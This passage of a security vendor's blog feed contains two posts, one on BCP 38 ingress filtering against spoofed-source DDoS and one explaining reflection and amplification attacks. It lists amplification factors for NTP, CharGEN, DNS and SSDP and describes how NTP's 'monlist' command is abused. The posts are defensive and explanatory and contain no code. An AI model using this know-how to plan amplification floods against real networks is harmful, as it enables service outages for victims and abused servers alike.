RFC 2267 – Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing http://tools.ietf.org/html/rfc2267.html

RFC 2827 / BCP 38 – Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing http://tools.ietf.org/html/rfc2827.html

RFC 3704 / BCP 84 – Ingress Filtering for Multihomed Networkshttp://tools.ietf.org/html/rfc3704.html

There are distinct methods to implement ingress filtering in a network. The choice must be based on the topology and the advantages and disadvantages of each deployment option.

    • Ingress access lists: most common method that compares addresses of every packet against a list of acceptable prefixes. Its main disadvantages include the manual maintenance and size that may become large depending on the environment.

    • Strict Reverse Path Forwarding: is conceptually similar to access lists but Strict RPFs are dynamic. It is a simple and fast option for edge routers that advertise BGP prefixes. Implementation brings some challenges on networks that employ asymmetric routing or are multi-homed, requiring the usage of BGP communities to force longer internal (not advertised) AS paths.

    • An extension of Strict RPF used to solve some of the problems experienced on asymmetric routing or multi-homed networks. In simple terms, if the advertisement of a prefix is filtered, packets will be filtered as well.

    • For the presence of a route, including the default, to decide if packets should be forwarded or dropped. It doesn’t take into account where the route points to. It is in fact a route existence check. Problems with drop packets may occur on asymmetric routing environments.

  • Loose Reverse Path Forwarding Ignoring Default Routes: is an explicit route check method that excludes default routes. Is useful when routes are created to cover all legitimate traffic and default routes only exist to catch bogus traffic.

The following additional scenarios must be taken into account when implementing BCP 38 or mitigating DDoS attacks:

    • Spoofed source addresses don’t have to belong to unassigned or reserved networks, like 10.0.0.0/8 or 192.168.0.0/16. In fact, attackers most frequently randomize source addresses, utilizing prefixes assigned to geographically distributed networks and even the few ranges still not assigned to any company.

      During a SYN flood attack, the targeted system sends SYN-ACK replies to what it believes to be the originating systems, looking to complete the 3-way TCP handshake. Because source addresses are spoofed, innocent systems receive unwanted traffic. Under certain circumstances, this may result in a secondary denial of service.

    • A situation that is not commonly taken into account during the mitigation of DDoS attacks is an attacker spoofing a certain network or networks, creating for example a SYN flood. The network administrator of the targeted infrastructure calls its network provider, ISP X, and decide to filter all traffic coming from the impersonated networks. The consequence of this action is users from non-hostile spoofed networks are denied access to all networks connected to ISP X, resulting in an unintentional denial of service. This unveils how sensitive is the task of blocking traffic originating from the Internet, without an appropriate assessment.

    • Network operators should log information on dropped packets to monitor suspicious activities.

    • If IPSec and AH (Authentication Header) are not enabled, spoofing IPv6 source addresses is as simple as in IPv4 [3]. Unfortunately, the IPv6 specification makes the usage of IPSec optional. Source routing would be another option for attackers, but versions 4 and 6 of the Internet Protocol have the routing header type 0 disabled by default.

References:

[1] BCP38 – http://www.bcp38.info/[2] DoS SYN flood attack – http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/100830-asa-pix-netattacks.html[3] IPv6 security brief – http://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/enterprise-ipv6-solution/white_paper_c11-678658.html[4] Ingress Filtering For Multihome Networks – http://tools.ietf.org/pdf/rfc3704.pdf
 
 

Protect Your Business

Malware Patrol offers a wide variety of threat intelligence feeds for use within organizations of all sizes and industries, including a real-time feed of amplification and reflection DDoS attacks that have happened in the last 24 hours. We verify our feeds constantly – every hour in most cases – to ensure they contain only actionable indicators that protect our customers against malware infections and data breaches.

For ease of use, we format the feeds for compatibility with the most popular security tools and platforms. To learn more or to request a free evaluation, you can contact us and our cybersecurity experts will get in touch with you.

Andre Correa

Co-Founder, Malware Patrol

Andre Correa - Malware PatrolInformation Security and Threat Intelligence Professional whose qualifications include in-depth knowledge of Internet technologies, current cyber security landscape, incident response, security mechanisms and best practices. He founded the Malware Patrol project in 2005. The company is helping enterprises around the world to protect themselves from malware and ransomware attacks through some of the most comprehensive threat data feeds and block lists on the market.

The post Spoofed DDoS Attacks and BCP 38 appeared first on Malware Patrol.

]]>
DDoS: What is a Reflection and Amplification Attack? https://www.malwarepatrol.net/ddos-reflection-and-amplification-attacks/ Mon, 04 Jul 2016 18:12:47 +0000 https://www.malwarepatrol.net/?p=25964 The post DDoS: What is a Reflection and Amplification Attack? appeared first on Malware Patrol.

]]>

 ddos what is

 

Updated on 06/13/2022

DDoS – What is it?

A distributed denial-of-service (DDoS) attack is a type of cyber attack in which a malicious actor seeks to disrupt normal traffic of a targeted server, service, or network by overwhelming it with traffic.

Brand reputation, time, clients, and money can be be in risk in case of a DDoS attack. Depending on the severity of an attack, resources could be offline for hours, days and even more.

 

DDoS – Reflection and Amplification

Reflection and amplification are mechanisms commonly used in DDoS attacks. These simple and very effective techniques gained popularity around 2013. They take advantage of publicly accessible UDP services to overload victims with response traffic. Attackers usually do not have to abuse old versions of protocols or exploit vulnerabilities. Instead, legitimate traffic is used.

Reflection occurs when an attacker forges the source address of request packets, pretending to be the victim. Servers are unable to distinguish legitimate from spoofed requests when UDP is used. Therefore, they reply directly to the victim. This technique hides the real IP address of the attacker from both the victim’s system and the abused server.

The other mechanism is traffic amplification. The attacker’s goal is to make the abused service produce as much response data as possible. The ratio between the response and request sizes is called amplification factor. The attacker wants to achieve the largest possible ratio. For example, if an open CharGEN service is used to flood a victim, an amplification factor of up to 359 times can be observed. (Notice that, although CharGEN is not expected to be used these days and should never be openly exposed to the Internet, this is a legitimate service and no vulnerabilities need to be exploited to produce attacks.)

When these techniques are repeatedly used together, an attack is generated. Servers in multiple locations can be involved to produce more devastating results. It is important to realize that abused services are victims as well as those targeted by reply floods. These servers suddenly have to deal with abnormally large amounts of spoofed requests that may prevent them from serving legitimate traffic.

Many UDP protocols can be abused. Among the most common are: NTP with an amplification factor of 557 times, CharGEN with a factor of 359 times, DNS with a factor from 28 to 54 times, and SSDP with a factor of 31 times [1].

The abuse of NTP requires that an old feature of the protocol be active. The attacker uses the debug command ‘monlist’ to trigger large amounts of data directed to the victim system. The usage of this command doesn’t require authentication or authorization. A server is supposed to return statistics about NTP clients, such as IP address, NTP version, and the number of requests to the NTP server. The response is sent in up to 100 UDP datagrams with a 440 bytes payload each. The amplification factor of ‘monlist’ depends directly on the number of client IPs returned by the server but is always very high. The maximum number of table entries that ‘monlist’ returns are 600 (for Linux implementations of NTP). This means that the maximum amount of data returned for a single query can go up to 50KB. The ‘monlist’ command is not the only one with a significant amplification factor, others can be abused as well to produce attacks.

There are millions of services on the Internet that attackers can abuse, but they all can be secured to avoid participation in DDoS attacks. Some could be completely shut down, others should be put behind a firewall to prevent external access, while some require reconfiguration or upgrades to provide proper security mechanisms.

All companies running UDP services exposed to the Internet are urged to properly implement security measures to prevent them from being used in DDoS attacks.

 

Protect Your Business

Malware Patrol offers a wide variety of threat intelligence feeds for use within organizations of all sizes and industries, including a real-time feed of amplification and reflection DDoS attacks that have happened in the last 24 hours. We verify our feeds constantly – every hour in most cases – to ensure they contain only actionable indicators that protect our customers against malware infections and data breaches.

For ease of use, we format the feeds for compatibility with the most popular security tools and platforms. To learn more or to request a free evaluation, you can contact us and our cybersecurity experts will get in touch with you.

Andre Correa

Co-Founder, Malware Patrol

Andre Correa - Malware PatrolInformation Security and Threat Intelligence Professional whose qualifications include in-depth knowledge of Internet technologies, current cyber security landscape, incident response, security mechanisms and best practices. He founded the Malware Patrol project in 2005. The company is helping enterprises around the world to protect themselves from malware and ransomware attacks through some of the most comprehensive threat data feeds and block lists on the market.

The post DDoS: What is a Reflection and Amplification Attack? appeared first on Malware Patrol.

]]>